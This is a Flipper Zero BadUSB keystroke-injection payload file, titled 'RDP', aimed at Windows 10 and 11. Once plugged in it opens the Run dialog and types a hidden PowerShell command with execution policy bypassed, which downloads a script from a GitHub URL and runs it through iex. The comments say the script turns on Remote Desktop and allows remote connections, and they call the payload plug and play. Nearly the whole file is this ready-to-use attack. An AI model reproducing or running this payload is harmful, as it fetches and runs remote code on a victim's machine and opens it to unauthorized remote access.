Flipper-Zero-BadUSB/Payloads/Flip-RDP/activateRDP.txt
2022-12-30 01:20:55 +01:00

16 lines
633 B
Text

REM Title: RDP
REM Author: UNC0V3R3D
REM Description: This payload is going to activate remote desktop and allow remote connections.
REM Target: Windows 10, 11
REM --------------------------------------------------------------------------------------
REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM --------------------------------------------------------------------------------------
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/rdpscript.ps1 | iex
ENTER